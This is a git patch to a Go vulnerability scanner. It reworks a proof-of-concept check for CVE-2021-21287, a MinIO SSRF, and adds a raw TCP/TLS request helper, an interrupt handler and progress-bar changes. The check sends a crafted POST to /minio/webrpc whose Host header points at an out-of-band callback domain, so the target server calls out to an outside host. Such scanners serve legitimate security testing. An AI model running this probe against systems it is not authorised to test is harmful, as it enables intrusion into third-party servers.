From 20af669f43a0e98cce6a67a73439734bf189e618 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=82=A0=E5=93=89?= <2086189633@qq.com> Date: Sun, 30 Jan 2022 16:05:03 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BC=98=E5=8C=96=E4=BB=A3=E7=A0=81=E7=BB=93?= =?UTF-8?q?=E6=9E=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- active/poc/CVE-2021-21287.go | 30 ++++++-------- active/pocScan.go | 3 +- main.go | 14 +++++++ util/util.go | 77 ++++++++++++++++++++++++++++++++---- 4 files changed, 97 insertions(+), 27 deletions(-) diff --git a/active/poc/CVE-2021-21287.go b/active/poc/CVE-2021-21287.go index bf6ae63..dc714f2 100644 --- a/active/poc/CVE-2021-21287.go +++ b/active/poc/CVE-2021-21287.go @@ -1,8 +1,7 @@ package poc import ( - "net/http" - "strings" + "fmt" "youzai/util" ) @@ -26,26 +25,23 @@ func (Info *PocInfo) CVE_2021_21287_Init() { poc.Config.Proxy = PocCustomize.Config.Proxy poc.Config.Proxy_Url = PocCustomize.Config.Proxy_Url - // 生成http客户端 - cli := util.Http_Client(poc.Config.Timeout, poc.Config.Proxy, poc.Config.Proxy_Url) - // 编写自定义检测函数,返回值有两个,第一个是判断是否存在存在漏洞,第二个参数返回响应状态码 poc.Config.Check = func() (bool, int) { pocData := `{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}` randstr, ceye_url := util.Get_Ceye() - request, err := http.NewRequest("POST", poc.Config.Url+"/minio/webrpc", strings.NewReader(pocData)) - if err != nil { - return false, 0 - } - request.Host = ceye_url - request.Header.Set("Content-Type", "application/json") - if response, err := cli.Do(request); err != nil { - return false, 0 - } else { - if util.Ceye_Check(randstr) { - return true, response.StatusCode - } + tcpData := "POST /minio/webrpc HTTP/1.1\r\n" + tcpData += fmt.Sprintf("Host: %s\r\n", ceye_url) + tcpData += poc.Config.User_Agent + "\r\n" + tcpData += "Content-Type: application/json\r\n" + tcpData += "Content-Length: 76\r\n" + tcpData += "Connection: close\r\n\r\n" + tcpData += pocData + + _, code := util.Tcp_Send(poc.Config.Url, tcpData, 10) + success := util.Ceye_Check(randstr) + if success { + return true, code } return false, 0 } diff --git a/active/pocScan.go b/active/pocScan.go index 2a0dfe5..9b7bfa9 100644 --- a/active/pocScan.go +++ b/active/pocScan.go @@ -88,7 +88,6 @@ func Scanning_Panel(wg *sync.WaitGroup) { green := color.FgGreen.Render blue := color.FgBlue.Render yellow := color.FgYellow.Render - cyan := color.FgCyan.Render is_Stop := false for { if is_Stop { @@ -98,7 +97,7 @@ func Scanning_Panel(wg *sync.WaitGroup) { for i := 0; i < len(Scanning); i++ { numtemp, _ := strconv.ParseFloat(fmt.Sprintf("%.2f", float64(Scan_Num)/float64(Scan_Num_True)), 64) num := int(numtemp * 50) - color.Print(green("[INFO]"), blue(Scanning[i]), yellow(" <["), cyan(strings.Repeat("■", num)), strings.Repeat(" ", 50-num), yellow("]> "), int(numtemp*100), "%", "\r") + color.Print(green("[INFO]"), blue(Scanning[i]), yellow(" <["), strings.Repeat("■", num), strings.Repeat(" ", 50-num), yellow("]> "), int(numtemp*100), "%", "\r") time.Sleep(time.Millisecond * 100) if num == 50 { after := time.Now().Unix() diff --git a/main.go b/main.go index 6948b94..ea6b647 100644 --- a/main.go +++ b/main.go @@ -2,6 +2,9 @@ package main import ( "flag" + "fmt" + "os" + "os/signal" "strings" "time" "youzai/active" @@ -63,6 +66,16 @@ func usage_info() { color.Cyanln(h) } +func active_interrupt() { + sigChan := make(chan os.Signal, 1) + signal.Notify(sigChan, os.Interrupt) + sig := <-sigChan + _ = sig + fmt.Println() + color.Println("[EXIT]", "The Scan Stop Because Of User Interrupt") + os.Exit(0) +} + // 执行扫描 func active_Check(vuln_type string) { // 检查是否使用代理 @@ -118,5 +131,6 @@ func config_info() { // 扫描器入口 func main() { + go active_interrupt() config_info() } diff --git a/util/util.go b/util/util.go index 856df72..76ec0fc 100644 --- a/util/util.go +++ b/util/util.go @@ -5,9 +5,12 @@ import ( "fmt" "io/ioutil" "math/rand" + "net" "net/http" "net/http/httptrace" "net/url" + "regexp" + "strconv" "strings" "time" @@ -25,6 +28,15 @@ type Ceye_Info struct { var Ceye = Ceye_Info{} +// 获取ceye随机数和域名 +func Get_Ceye() (randstr, ceye_url string) { + rand.Seed(time.Now().UnixNano()) + t := rand.Intn(100000) + randstr = fmt.Sprintf("%d", t) + ceye_url = randstr + "." + Ceye.Ceye_Url + return randstr, ceye_url +} + // 用于检测ssrf的函数 func Ceye_Check(randstr string) bool { red := color.Red.Render @@ -71,6 +83,63 @@ func Http_Client(timeout int, proxy bool, proxy_url string) *http.Client { return cli } +// 使用tcp发送数据 +func Tcp_Send(target_url string, data string, timeout int) (response_data string, response_code int) { + reg := regexp.MustCompile(`.*(\d{3}).*`) + urli := url.URL{} + url, _ := urli.Parse(target_url) + switch url.Scheme { + case "http": + var host = url.Host + if !strings.Contains(host, ":") { + host = url.Host + ":80" + } + net, err := net.DialTimeout("tcp", host, time.Second*time.Duration(timeout)) + if err != nil { + color.Println("[WARNING]", err) + } + defer net.Close() + _, _ = net.Write([]byte(data)) + buf := make([]byte, 20480) + n, err := net.Read(buf) + if err != nil { + color.Println("[WARNING]", err) + } + result := reg.FindStringSubmatch(string(buf[:n])) + if len(result) != 0 { + code, _ := strconv.Atoi(result[len(result)-1]) + return string(buf[:n]), code + } + return "", 0 + + case "https": + conf := &tls.Config{ + InsecureSkipVerify: false, + } + var host = url.Host + if !strings.Contains(host, ":") { + host = url.Host + ":443" + } + net, err := tls.Dial("tcp", host, conf) + if err != nil { + color.Println("[WARNING]", err) + } + defer net.Close() + _, _ = net.Write([]byte(data)) + buf := make([]byte, 20480) + n, err := net.Read(buf) + if err != nil { + color.Println("[WARNING]", err) + } + result := reg.FindStringSubmatch(string(buf[:n])) + if len(result) != 0 { + code, _ := strconv.Atoi(result[len(result)-1]) + return string(buf[:n]), code + } + } + return "", 0 +} + // 检测网络连通性 func Net_Check(url string) bool { green := color.FgGreen.Render @@ -104,11 +173,3 @@ func Net_Check(url string) bool { return true } } - -func Get_Ceye() (randstr, ceye_url string) { - rand.Seed(time.Now().UnixNano()) - t := rand.Intn(100000) - randstr = fmt.Sprintf("%d", t) - ceye_url = randstr + "." + Ceye.Ceye_Url - return randstr, ceye_url -}